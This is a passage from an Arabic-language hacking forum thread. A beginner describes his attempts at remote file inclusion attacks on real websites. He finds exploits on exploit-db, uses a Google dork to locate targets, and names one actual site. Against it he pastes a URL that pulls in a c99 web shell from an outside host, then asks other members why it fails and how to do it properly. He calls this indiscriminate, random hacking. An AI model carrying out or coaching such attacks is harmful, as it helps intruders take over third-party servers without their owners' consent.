بارك الله فيكم إخواني على المرور
أخي يزيد تشكر، لكن يعني ما زلت مبتدئ، و لا زال علي إستغلال هذه الثغرة و ذلك أولا للتطبيق مع الدروس، بعدها ممكن أنتقل إلى sql و باقي الثغرات
أخي دارك بارك الله فيك على رأيك، و أنا قلت، لما أكمل مشواري في التعلم راح أنتقل إلى مستوى آخر
أخي الكريم فولكانو مشكور على المرور و على المتابعة الدائمة منك
صراحة مدير مثلك ولا خلي
--------------------------------------------------
الآن أخي الكريم الهيكل الأزرق، آسف على التأخير، و ذلك أنني حاولت إستثمار الثغرة، و لكن بدون جدوى
يعني أنا لست فاهم جيدا الأمر، هذا الموقع الذي أعطيتني له، لم تعطني الثغرة معه
و أنا لست عارف الملف المصاب هنا ( لا زلت مبتدئ )
أنا بصراحة لا زلت في الإختراق العشوائي
المهم راح أجيبك
أنا رحت بحثت في موقع www.exploit-db.com
عن ثغرات remote file include
أعطاني عدة ثغرات، قمت بإختيار التي تحتوي على الدورك
مثلا لنفترض أنني إخترت الثغرة التي تحمل الدورك inurl:"com_mojo" ( نسيت إسم الثغرة )
و إستغلالها هو :
http://www.site.com/components/com_m...ute_path=shell
قمت بإدخال الدورك في google، ظهرت العديد من المواقع
نفترض أننا إخترنا هذا الموقع : http://www.shineonbrightly.com/compo...temid,44/p,92/
فلنقم الآن بعمل الإستثمار :
http://www.shineonbrightly.com/compo...y.com/c99.txt?
الآن كل شيء تمام، أليس هذا صحيحا ؟
لنقم بإلصاق الإستغلال في المتصفح
هنا يأتي سؤال، لاحظ حبيبي ماذا ينتج :
و هكذا مع باقي المواقع ( نصف هكذا و نصف صفحة بيضاء )
هل عملي صحيح ؟ هل أنا مخطئ في شيء ؟ ( لا أظن )
قمت بإختيار ثغرة أخر من نوع remote file include يبقى نفس الشيء
-------------------------------------------------------
بالنسبة للموقع الذي أنت وضعته بصراحة لم أفهم شيء، لأني بدون وضع الإستغلال لا أستطيع عمل شيء، و ذلك أنني مبتدئ في هذا المجال
يا ريت يا غالي تشرح لنا طريقة
و الله بارك الله فيك يا ولد بلادي
صراحة أول مرة أرى شخص يريد يتابع إستفسار شخص ما بهذه الطريقة
فبارك الله فيك و جعلها اللهم في ميزان حسناتك
تحياتي لك و لباقي الإخوة